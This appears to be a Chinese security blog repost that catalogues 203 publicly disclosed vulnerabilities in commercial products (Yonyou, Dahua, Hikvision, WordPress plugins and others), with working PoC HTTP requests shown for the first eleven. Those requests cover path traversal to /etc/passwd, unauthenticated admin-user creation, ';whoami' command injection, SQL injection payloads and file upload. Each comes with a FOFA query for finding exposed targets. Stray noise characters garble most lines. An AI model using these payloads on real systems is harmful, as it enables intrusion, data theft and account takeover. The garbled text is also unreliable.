互联网公开漏洞整理202309-202406* s2 \. o* m* c5 B
道一安全 2024-06-05 07:41 北京
$ l( N I }0 m5 h" q以下文章来源于网络安全新视界 ,作者网络安全新视界
8 k+ F" F5 K1 e( O
s5 K$ _/ K' I8 v" f/ J: a% g发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。4 f. R3 i( n i$ ~! w4 R# q
+ d+ n7 _' A$ a' V漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
7 N, m% N( c! w. l) M' L" y) H5 r! A. Y* s
安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
: j: c% @: p( L0 m" a& R! ^; v, a- l6 [+ Q* a
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
. [% V7 J+ N2 q' W8 I+ g( W/ n) a! I( A7 ~4 ?- a: s
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。) F2 n+ r6 n4 y, [% ]8 q1 {$ e
* G) e) H+ f, \
. r, M$ ?9 I. f- L声明
' Y1 y: d7 V7 n# _% V, x9 L" ]3 u0 x# i J
为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。8 i1 S! U; o3 r8 g' V$ _
; F# w; c$ m9 O
有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
5 Z8 w4 v8 n+ B+ j; y3 p% x
3 m6 ^7 e M& ^9 B
2 O/ B* d# v$ L$ v0 s4 _7 y6 x! ?( \6 w, x i% T/ F/ ~
目录
3 o0 G8 d1 P, ]3 @! R& t/ N9 {! b6 |+ C+ G/ k! d3 g: c7 u4 N
01 O% d6 S' s" N8 i' Y+ |0 k2 m5 C1 l
- T A! `+ S! c6 N! J( b
1. StarRocks MPP数据库未授权访问6 ?* B% `6 ]+ Z. ] G7 U
2. Casdoor系统static任意文件读取4 x% B6 y# f# v9 i
3. EasyCVR智能边缘网关 userlist 信息泄漏+ R! ]2 x* X0 E- O
4. EasyCVR视频管理平台存在任意用户添加
8 L$ H" [1 _$ C2 U& }2 n( v5. NUUO NVR 视频存储管理设备远程命令执行4 H% K" \; J) k* m, Y/ w
6. 深信服 NGAF 任意文件读取1 P7 S0 A6 C. E t' J: u
7. 鸿运主动安全监控云平台任意文件下载
, @+ y x0 i) W! @# q r" d8. 斐讯 Phicomm 路由器RCE- i* u6 E- ]2 \0 V
9. 稻壳CMS keyword 未授权SQL注入 `7 ?2 U' P& ?6 q6 Z
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传* Q# Z4 N9 o7 R; |' f
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入( X& _5 C8 p* |' W) L
12. Jorani < 1.0.2 远程命令执行5 v: K% o% W9 }4 }/ _: e+ I* {
13. 红帆iOffice ioFileDown任意文件读取
% G0 }. n# V* z1 s3 |# E14. 华夏ERP(jshERP)敏感信息泄露8 U4 ~7 I) h5 F+ R& q, N" K/ {
15. 华夏ERP getAllList信息泄露
2 p: t7 ?$ U" w3 ]% u& V) g W16. 红帆HFOffice医微云SQL注入
. O+ \& E& S; M+ y+ l17. 大华 DSS itcBulletin SQL 注入
. D4 T' T# d% v18. 大华 DSS 数字监控系统 user_edit.action 信息泄露, b9 q; ~- F! q4 {. r, e
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入/ n( p: ?/ v% L( \* S
20. 大华ICC智能物联综合管理平台任意文件读取
D5 M" H: ?% s$ O, r21. 大华ICC智能物联综合管理平台random远程代码执行
3 L& }$ E* v6 P" u" q22. 大华ICC智能物联综合管理平台 log4j远程代码执行
/ [; ^, `/ {! H9 f- _23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
! C" R: o/ T- Q* t5 i24. 用友NC 6.5 accept.jsp任意文件上传* F4 \" V3 u4 u: y: n5 o& S8 L2 w0 I3 O: n
25. 用友NC registerServlet JNDI 远程代码执行; v& c: q" E% W* s! t
26. 用友NC linkVoucher SQL注入
- y+ c0 \' U0 G! V! G27. 用友 NC showcontent SQL注入- \) a7 R' e8 I) ^7 C( m
28. 用友NC grouptemplet 任意文件上传* V4 J F- {3 w& s1 E
29. 用友NC down/bill SQL注入1 b9 h. X C' w5 I; w( i) _3 Q
30. 用友NC importPml SQL注入0 e4 N# J7 H1 C; ?' ~
31. 用友NC runStateServlet SQL注入
$ ?( K Q2 e' q: K32. 用友NC complainbilldetail SQL注入% Z, T% u! E- z D/ _! P! X
33. 用友NC downTax/download SQL注入) y( e L7 G: ^$ q+ l
34. 用友NC warningDetailInfo接口SQL注入
0 D- N0 _! a& a# T35. 用友NC-Cloud importhttpscer任意文件上传
# ^# E7 v( d4 U1 {0 l36. 用友NC-Cloud soapFormat XXE% L2 w& C! } J( I; Y: O
37. 用友NC-Cloud IUpdateService XXE4 y/ G( ~4 @8 ]# G4 b& [/ r. M7 d
38. 用友U8 Cloud smartweb2.RPC.d XXE
$ r7 G3 y. @0 q* S* }( i! a3 H39. 用友U8 Cloud RegisterServlet SQL注入5 D, \9 G$ }2 y' c3 ]
40. 用友U8-Cloud XChangeServlet XXE& N! D7 ^- k% p# }$ I
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入! w$ D: O ^% p9 H/ N O+ c
42. 用友GRP-U8 SmartUpload01 文件上传9 I q6 T) s+ t$ f& F1 c& T/ M
43. 用友GRP-U8 userInfoWeb SQL注入致RCE" P$ d, _) a- X9 V
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
& I, R: E& n$ L, w45. 用友GRP-U8 ufgovbank XXE0 Z6 j6 z5 N" A& b. ^8 S
46. 用友GRP-U8 sqcxIndex.jsp SQL注入# k& K$ ~3 j$ n5 ~/ [" t: G
47. 用友GRP A++Cloud 政府财务云 任意文件读取
& b \+ k. C% P2 s3 U/ X48. 用友U8 CRM swfupload 任意文件上传6 ^6 [! B9 Q5 T3 O
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
; L0 R5 ~0 V6 o* J! V0 g* f50. QDocs Smart School 6.4.1 filterRecords SQL注入
$ l$ V9 Y4 Y, H0 O) f. m" v51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
) p, A5 P j+ j' n6 l. \1 @52. 泛微E-Office json_common.php sql注入 ^- [( _5 R3 i C: _: S
53. 迪普 DPTech VPN Service 任意文件上传9 k# |" N- Q% A9 w' p4 |% C
54. 畅捷通T+ getstorewarehousebystore 远程代码执行8 @# Q7 Q* j! X: a4 Q% A3 D
55. 畅捷通T+ getdecallusers信息泄露9 ]# N' K+ e1 Z+ f4 ` m
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
( p" o+ Z: L4 b- o6 y3 C+ m57. 畅捷通T+ keyEdit.aspx SQL注入
' {, o! C+ b/ ?4 W0 M5 V) H. ?$ Q58. 畅捷通T+ KeyInfoList.aspx sql注入1 R+ e$ t9 k# V
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
8 u$ B* W" t! a+ {8 X60. 百卓Smart管理平台 importexport.php SQL注入* O+ F! |$ n) N
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
* t! K& w$ H" ^8 b62. IP-guard WebServer 远程命令执行: t6 a& @9 m0 ^# [
63. IP-guard WebServer任意文件读取6 m3 |3 x1 d0 w. c \. ^5 l3 z. J9 ?8 r
64. 捷诚管理信息系统CWSFinanceCommon SQL注入; a/ g" S" G ?, z- d+ P6 Y
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过3 c; N9 r7 h7 ^. C1 v7 @+ `8 O( z/ v0 z
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
* A* d6 Q, Z$ H* h% k6 P4 R67. 万户ezOFFICE wpsservlet任意文件上传6 Q/ X, j8 y5 c/ ^+ Q0 e/ v
68. 万户ezOFFICE wf_printnum.jsp SQL注入
4 o) T4 W [1 [" e# k69. 万户 ezOFFICE contract_gd.jsp SQL注入
2 i. `( s9 z5 x70. 万户ezEIP success 命令执行
+ `$ _7 |3 v6 v! A+ N3 e71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入* o! c ]/ P$ `5 a! Q: n4 [" P* O
72. 致远OA getAjaxDataServlet XXE
# {% _5 _ U( Y; y/ V73. GeoServer wms远程代码执行, B$ e7 u% h! ~2 D n; b
74. 致远M3-server 6_1sp1 反序列化RCE* M2 U/ I! j3 ?# J3 q4 M
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
) m( j/ N7 m) q% U- q76. 新开普掌上校园服务管理平台service.action远程命令执行
* A1 e' N. v. d% @* @77. F22服装管理软件系统UploadHandler.ashx任意文件上传2 z# l: o2 s; S) Y; Q! u* y- |
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传0 _8 H9 m H7 u: w6 n; \
79. BYTEVALUE 百为流控路由器远程命令执行
# h d( y+ N- D/ h. O* g) y80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传. \$ D, ?7 i6 d3 l/ Q
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
& c8 R0 I! P$ d& f4 ` p9 V82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
V& z: ~1 L# _83. JeecgBoot testConnection 远程命令执行
7 p/ U) e; g* q* W5 U& E% B2 S84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
0 u! }, D: }2 A1 |, Z$ s0 e E85. SysAid On-premise< 23.3.36远程代码执行1 I2 @( b; E/ G: A0 P3 I* R
86. 日本tosei自助洗衣机RCE! n7 T1 E. |; W y5 S
87. 安恒明御安全网关aaa_local_web_preview文件上传
6 u8 N9 I+ t: @0 S88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行$ r* I8 l; Z: m) h) b* h: J
89. 致远互联FE协作办公平台editflow_manager存在sql注入
0 ]9 b: B& H: ^; H; } T90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行1 |" h2 r# L: s' c; G
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取1 E8 l1 C; e3 M& s
92. 海康威视运行管理中心session命令执行
" M+ ]# l; H, K& M) }93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
% d0 l m9 h( J* N7 A94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传* X- W, k) [( O% w" o. B( U
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行+ n6 a. V* J- t8 }# f0 u7 K
96. Apache OFBiz 18.12.11 groovy 远程代码执行1 J- Q/ ]; T/ u: k
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行2 U/ I$ q! C6 N: F: w
98. SpiderFlow爬虫平台远程命令执行
, ^7 C# y! m4 Y) l99. Ncast盈可视高清智能录播系统busiFacade RCE# A+ W- q* O; A/ r& B1 A
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
$ \) P# c8 Q0 [1 S101. ivanti policy secure-22.6命令注入
9 |* A) V( v/ z! |102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
3 g% h( n8 @. b- I. w" q! V103. Ivanti Pulse Connect Secure VPN XXE- _; k0 W# B/ B+ v
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露 t' M% a! H, c2 F) B) n2 G' L/ d
105. SpringBlade v3.2.0 export-user SQL 注入3 X* @! A7 o. L$ H2 J' z. X1 L
106. SpringBlade dict-biz/list SQL 注入 P! j# j9 r% J* o5 d
107. SpringBlade tenant/list SQL 注入
' U; o- [# D2 \7 z- f. u8 i7 u& S108. D-Tale 3.9.0 SSRF, f- O6 A& V7 }
109. Jenkins CLI 任意文件读取
$ \% g7 G& z$ }# S4 n' J110. Goanywhere MFT 未授权创建管理员5 ]3 Q2 M. G0 ~5 c8 L5 P& s
111. WordPress Plugin HTML5 Video Player SQL注入
8 X2 t. N1 R( A8 @2 p) j8 ^112. WordPress Plugin NotificationX SQL 注入
, @( g9 G3 B: p1 O: j+ e4 `/ R113. WordPress Automatic 插件任意文件下载和SSRF+ G1 J8 w. n( A. v: d
114. WordPress MasterStudy LMS插件 SQL注入
" Y3 D( g1 K2 h9 J1 O% c115. WordPress Bricks Builder <= 1.9.6 RCE! V( w6 }, c* z6 |1 F- y. E
116. wordpress js-support-ticket文件上传
. P' @ q, n( @- x# }6 @! W117. WordPress LayerSlider插件SQL注入
4 q; j: n( k' _- z0 m" Z% ^118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
: D8 F; }3 b5 Z F, ^7 y- q119. 北京百绰智能S20后台sysmanageajax.php sql注入3 D+ G; s! D+ q$ ]! x9 V
120. 北京百绰智能S40管理平台导入web.php任意文件上传2 q# C% Z2 D) S' d/ R' y* H
121. 北京百绰智能S42管理平台userattestation.php任意文件上传* X% a2 L. t8 B- V3 [- W/ f
122. 北京百绰智能s200管理平台/importexport.php sql注入
6 p0 ^$ f/ @7 r* A# B7 _) A123. Atlassian Confluence 模板注入代码执行) H) j% `' O n5 A# b
124. 湖南建研工程质量检测系统任意文件上传
+ V+ a) H; w' R125. ConnectWise ScreenConnect身份验证绕过. C& ~6 z# R5 p8 ?* g% A
126. Aiohttp 路径遍历1 l+ {! I. g% @0 `
127. 广联达Linkworks DataExchange.ashx XXE, ]! J* p E' y
128. Adobe ColdFusion 反序列化8 [4 ~( x+ R$ |# I
129. Adobe ColdFusion 任意文件读取) M1 x) s: h) h! G4 C
130. Laykefu客服系统任意文件上传
# j, f: q2 Q. L: s5 i. B131. Mini-Tmall <=20231017 SQL注入
. k$ t. x) _* d132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过, I8 K7 y( S) Q/ _/ y1 A6 _
133. H5 云商城 file.php 文件上传
7 n) G$ O( s5 r* V0 p* \# q134. 网康NS-ASG应用安全网关index.php sql注入
1 @3 l+ r: ^0 L6 [. X135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
4 b6 o# t& ]2 e! h# S2 v136. NextChat cors SSRF' S( B' f: \: W$ i) H: b: c
137. 福建科立迅通信指挥调度平台down_file.php sql注入. K6 w" b$ h) S S# g0 i+ r+ q/ N/ ]
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
) E8 K, `/ }1 r' ~% o0 k139. 福建科立讯通信指挥调度平台editemedia.php sql注入+ R$ Y+ c; o M( A8 P( @
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入* J E9 A1 |" o/ P
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
" e) C1 N/ U0 P( z x+ X1 A142. CMSV6车辆监控平台系统中存在弱密码
: o" t0 P" O9 x0 p* l143. Netis WF2780 v2.1.40144 远程命令执行
T3 m5 r/ v- n1 W+ q! j9 ?144. D-Link nas_sharing.cgi 命令注入; A$ q: m' P! Q% K( E6 j6 F0 v
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入, n/ N6 u) \# J2 `7 R) L
146. MajorDoMo thumb.php 未授权远程代码执行/ B1 ?5 }! |- Y/ ]3 I1 d
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历$ [8 l# S# a7 [& G2 [. u
148. CrushFTP 认证绕过模板注入6 |& |: \9 V7 O
149. AJ-Report开源数据大屏存在远程命令执行
! R( }3 Y4 z" X- s# s, p4 T9 M150. AJ-Report 1.4.0 认证绕过与远程代码执行
$ i1 Y5 C7 @& O: K0 z" K1 ?151. AJ-Report 1.4.1 pageList sql注入# }3 D8 o" J8 m
152. Progress Kemp LoadMaster 远程命令执行+ Q. e u" l7 s% p8 f6 O, M, Y
153. gradio任意文件读取
: W( Z0 V4 X( ~5 i% Z) n) l154. 天维尔消防救援作战调度平台 SQL注入
, @" x5 {# S. v% ~! m1 \155. 六零导航页 file.php 任意文件上传
4 i4 c# ?: Z6 {; E2 e( [156. TBK DVR-4104/DVR-4216 操作系统命令注入1 \: C$ l. m3 G* g- \# }
157. 美特CRM upload.jsp 任意文件上传4 z& ]4 \- K9 u' P# B a3 H+ }7 ^
158. Mura-CMS-processAsyncObject存在SQL注入
+ [# I) e2 e$ E! @& q4 c159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传! H! N. `0 E- F/ `& d4 |
160. Sonatype Nexus Repository 3目录遍历与文件读取; n" N# ~2 V# @
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
9 _# M# ^# F' g162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
; k* U# @; z* m" J3 q) }6 @163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
0 K3 C4 }1 k+ z2 j164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
) ]* k0 g. N5 c: W" L165. OrangeHRM 3.3.3 SQL 注入
" F1 a$ S) S9 }166. 中成科信票务管理平台SeatMapHandler SQL注入2 e) Y! \6 v8 \0 P
167. 精益价值管理系统 DownLoad.aspx任意文件读取
0 o7 I- C9 C2 ]168. 宏景EHR OutputCode 任意文件读取0 |( h# m- Z( i8 k6 I
169. 宏景EHR downlawbase SQL注入) ?0 j) ~+ Q0 f& g
170. 宏景EHR DisplayExcelCustomReport 任意文件读取! x: E, B* Z' _! D
171. 通天星CMSV6车载定位监控平台 SQL注入, x1 N7 G! c- p# d9 o/ i
172. DT-高清车牌识别摄像机任意文件读取
* g" y7 q8 E- ~7 T# n173. Check Point 安全网关任意文件读取
* Z( y4 P3 T2 i5 I8 w: r# m5 D: C, ]174. 金和OA C6 FileDownLoad.aspx 任意文件读取; ?" |" O/ M/ K, g& D
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入# ^$ O) c% s, `
176. 电信网关配置管理系统 rewrite.php 文件上传
; N8 q$ g! f! q% ]177. H3C路由器敏感信息泄露' E2 d! E3 H, J
178. H3C校园网自助服务系统-flexfileupload-任意文件上传- t" Y: Z; \" U, k$ Q
179. 建文工程管理系统存在任意文件读取; V$ R8 s% e) y7 S" |" U
180. 帮管客 CRM jiliyu SQL注入
. H- @3 e; ^: D/ c181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入0 N% P& C* ~; ]0 y7 \# ^9 S6 S
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建0 q5 {8 o, F0 ]. Y) v3 w
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
! |, o2 ~, R6 M184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加2 k a- J9 c" O$ k
185. 瑞友天翼应用虚拟化系统SQL注入
) A& G: B' O/ J$ U( {! h186. F-logic DataCube3 SQL注入; M3 I6 ~0 A1 J. v5 c% h
187. Mura CMS processAsyncObject SQL注入
8 y+ Q1 k5 g# @7 d: b0 z8 `188. 叁体-佳会视频会议 attachment 任意文件读取
2 r5 Z' E/ ~7 ~+ m8 L# H( {6 F189. 蓝网科技临床浏览系统 deleteStudy SQL注入
5 X6 f3 M. ?0 u/ y, ^- k6 i190. 短视频矩阵营销系统 poihuoqu 任意文件读取8 L8 p# q i/ a
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入5 M* G8 c: w: c' S
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传: X5 i. [. I6 A8 o S' }
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
- @) E! |8 n% r6 b. R194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传/ q) m7 o5 |7 u- z7 _, k" k
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行. v5 t* y4 P& ~1 i
196. 河南省风速科技统一认证平台密码重置3 n) L/ _0 R1 \" v! l7 M ], R
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入/ _: e; Q0 g- H, [3 M0 o
198. 阿里云盘 WebDAV 命令注入; d, ]8 w0 a! x X0 H3 q
199. cockpit系统assetsmanager_upload接口 文件上传5 d8 A! N0 S. t- x( d
200. SeaCMS海洋影视管理系统dmku SQL注入
6 p# W' L+ Y% Y; C* X201. 方正全媒体新闻采编系统 binary SQL注入
. H' m2 Z& Q8 S# f0 r& l202. 微擎系统 AccountEdit任意文件上传
( C/ ] O0 [9 Q- k1 ^0 s! i( b203. 红海云EHR PtFjk 文件上传
$ u: N4 D; r: W/ i! j. y9 y) `, U: J$ u
POC列表8 X) X) }0 S6 q0 q$ U5 J# a8 n
4 a4 v! j* x4 T, @ G, j2 j7 x
02- Z: K, F! ?/ u' f( f+ m/ i
5 v7 H" ]5 P" k+ Y1. StarRocks MPP数据库未授权访问
6 `0 t% T' F) z2 B" B# K( c/ @FOFA :title="StarRocks"
6 e8 P: \7 A" i; {GET /mem_tracker HTTP/1.1
0 q2 j) ~. I4 W% E' nHost: URL
8 g' X7 V/ O# L+ @0 H C! q$ @4 e/ L% o4 c5 F
* b/ e% H, \1 n I. K! ?
2. Casdoor系统static任意文件读取
d( g3 n4 o. |" @FOFA :title="Casdoor"4 e, \4 P* G4 n
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.15 B# U: d2 w* c7 ^1 g
Host: xx.xx.xx.xx:9999# X7 H; Q2 k1 h3 n. v" N* a& ?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
' a: }5 [5 C* s& b1 ~. T& Z1 U K, UConnection: close* R% L+ [7 a6 u% {+ F) M7 h, g* Y
Accept: */*- k E- K. @4 B- a2 c/ G
Accept-Language: en# B) F, i% j, R0 d4 C3 a
Accept-Encoding: gzip
1 X* n+ t3 y u3 A& E9 e# ?0 T; {9 M! X1 ~, u/ V# w9 w
' a4 F5 E7 z$ s8 e5 O& g: n) b/ K
3. EasyCVR智能边缘网关 userlist 信息泄漏$ |" }5 B, q6 n5 ]; W- p
FOFA :title="EasyCVR"4 A3 Z6 T& p4 X& _9 N/ J
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
" X% C) S% r1 RHost: xx.xx.xx.xx
4 u" M/ J3 ^! U& P5 C4 M+ Q7 V3 |5 t0 ~# U5 u( S- ]2 u' y' `
/ q S- w: \+ K
4. EasyCVR视频管理平台存在任意用户添加1 {; i+ Y3 z4 Q
FOFA :title="EasyCVR"2 U/ a/ }& z4 u% M
4 u4 x9 ~% c& L# V }9 R% u+ }9 a1 gpassword更改为自己的密码md5" A) b, n) G$ ?& Z
POST /api/v1/adduser HTTP/1.16 X( K9 U( D! Z9 A
Host: your-ip
$ Y7 g6 T N' b, yContent-Type: application/x-www-form-urlencoded; charset=UTF-8" m% v3 W4 c2 o$ s- v. _ [
- E2 e# ~, v- m& W3 }. O" ?1 A
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1" a/ `! A4 B7 Q" W7 M- m D
0 r! t* y- t: u
9 U! Y- Y; ~% z- x0 w1 g% l2 I
5. NUUO NVR 视频存储管理设备远程命令执行: |4 y) E( {, {1 v5 L0 t( L
FOFA:title="Network Video Recorder Login"
. D0 k7 |9 W! {GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1- F3 S& z% ~% A' C1 Z
Host: xx.xx.xx.xx
1 L5 h: u, v# B0 b0 w5 @2 ?6 G% {; ~5 v2 s5 o
* F* c) m2 S; s
6. 深信服 NGAF 任意文件读取
$ R: R& }" d% F) j4 EFOFA:title="SANGFOR | NGAF"
8 F" u: ?; D0 Y! t2 @& @; {GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1 D/ k4 G9 ?" L) L
Host:
9 I) X @ e ?8 [2 c' K
2 Z) W+ ]5 {; n1 }7 m- A
+ D" T: _. M& g5 m) T! S7. 鸿运主动安全监控云平台任意文件下载
$ n/ I3 Z3 G& U4 z$ ]+ P. i BFOFA:body="./open/webApi.html"( g# J0 D- B% |4 a+ f9 Y' j3 @' q
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
% ?8 K6 [( w$ O/ l* J8 g: t. UHost:
- e& R7 C4 v# ?8 e# B
; q: b1 i" X( j5 m1 h' U
1 d2 \' \, K) O: B, ? O8. 斐讯 Phicomm 路由器RCE( g: J9 ~, H1 u, F; I* `
FOFA:icon_hash="-1344736688"# R9 m: E" O6 ]' `6 A$ V) Y
默认账号admin登录后台后,执行操作$ H$ a0 \0 j( u+ K
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1+ V3 f1 [6 k: f9 E; i/ E
Host: x.x.x.x
) P0 e' c' d- z" V* ]/ oCookie: sysauth=第一步登录获取的cookie- T/ J" a# @0 {- i9 q& ^5 x2 @4 J
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz8 y, W8 X: _+ k' h
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36$ u: G, {- s/ ~) m3 Q
. ]5 J m2 X6 x% l( e5 W------WebKitFormBoundaryxbgjoytz/ F% |0 J; [) W! K" G" C4 F' C
Content-Disposition: form-data; name="wifiRebootEnablestatus"0 |7 P% |5 |" |; M: a! b- ~
8 T3 a* w* L/ D7 \3 ^! N
%s" }, D( [( A" `7 Y. ?/ y. M
------WebKitFormBoundaryxbgjoytz- n s6 O2 A' \* I' O
Content-Disposition: form-data; name="wifiRebootrange"
/ O7 M$ [0 Y C( Y
9 ]/ E0 ~( ]0 b4 Q# [* }3 \12:00; id;" N8 h$ C0 A g6 g+ l. t
------WebKitFormBoundaryxbgjoytz6 a) O+ Z% K h
Content-Disposition: form-data; name="wifiRebootendrange"; J; K2 k+ w2 h+ {! ~5 N
& o. V! i/ G; }0 _3 G
%s:8 Y6 m+ i9 Y3 n6 h k) t) `
------WebKitFormBoundaryxbgjoytz/ G9 [2 ~- x' J) V
Content-Disposition: form-data; name="cururl2"! T: X: F( g! Z$ w9 i$ _" N
& [1 i- ~0 x8 L3 u9 L
0 X- }! n' g, E) Q------WebKitFormBoundaryxbgjoytz--
d6 M$ b, o1 H. h# f& k: ` @9 ?
: Q m6 y E2 c7 }0 M: D% T
5 o$ ^+ L# A" R3 O1 ~3 b9. 稻壳CMS keyword 未授权SQL注入
% g f/ Y# }9 [% l$ U0 H. BFOFA:app="Doccms"
( f- B0 q* G) w! rGET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1) Y' M) D- _5 ~: l6 j
Host: x.x.x.x
# B& P, F; g8 R2 X
7 z9 O/ e& |5 c& s; Z9 ]% i% y
1 l, a/ ^( I9 ]4 z% f$ Jpayload为下列语句的二次Url编码
5 A$ N) X& ^& H( C
2 w' k3 }5 i8 ~% ~4 y' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
w I# w2 _( w7 P& ?4 u! D# E' _+ w! j
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
6 ]$ N# x) U3 K( u1 o2 iFOFA:icon_hash="953405444"4 Z! i9 B3 b3 e& a- _" S6 I2 t! O4 j! w1 X
8 i4 G6 v* O7 b+ P% x7 s0 D! I' p
文件上传后响应中包含上传文件的路径
1 }) Q- q R8 [1 BPOST /eis/service/api.aspx?action=saveImg HTTP/1.1
2 e# O9 U. }5 f( g, lHost: x.x.x.x:xx
+ O) S& m6 A- O; P$ kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.362 i* N" H/ \& p4 _* w
Content-Length: 197( e/ u5 q' W# }# }* V" N
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.98 F% L' Z% p: d3 P+ B: @
Accept-Encoding: gzip, deflate
' F. B4 u0 Y+ b& w; e0 o) s6 f- iAccept-Language: zh-CN,zh;q=0.9
1 v4 ^" a' e+ t+ T" @Connection: close4 F, e- p* |9 U/ f' ^& Q+ H* q0 \
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
& o2 i; J/ \/ B; ]# `9 {
; u2 ]7 T! X0 X* z------WebKitFormBoundaryxdgaqmqu
, y, |& C: Q+ Y; BContent-Disposition: form-data; name="file"filename="icfitnya.txt"# U- H! j5 ^7 `1 D) z4 R
Content-Type: text/html
* Z, }4 a/ U3 j0 e* Y, d" H# i% a2 e9 l6 h
jmnqjfdsupxgfidopeixbgsxbf
- |/ r0 W& E+ f& u& }3 u/ d$ ~* R, ~------WebKitFormBoundaryxdgaqmqu--0 @# }1 g3 V5 m- l( G
; K; w6 }% r2 W) K
8 v" O$ [8 _# w) N5 ]2 C11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
1 V1 c" X! w' fFOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"2 S3 O [3 R3 e, u6 ] \1 H
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
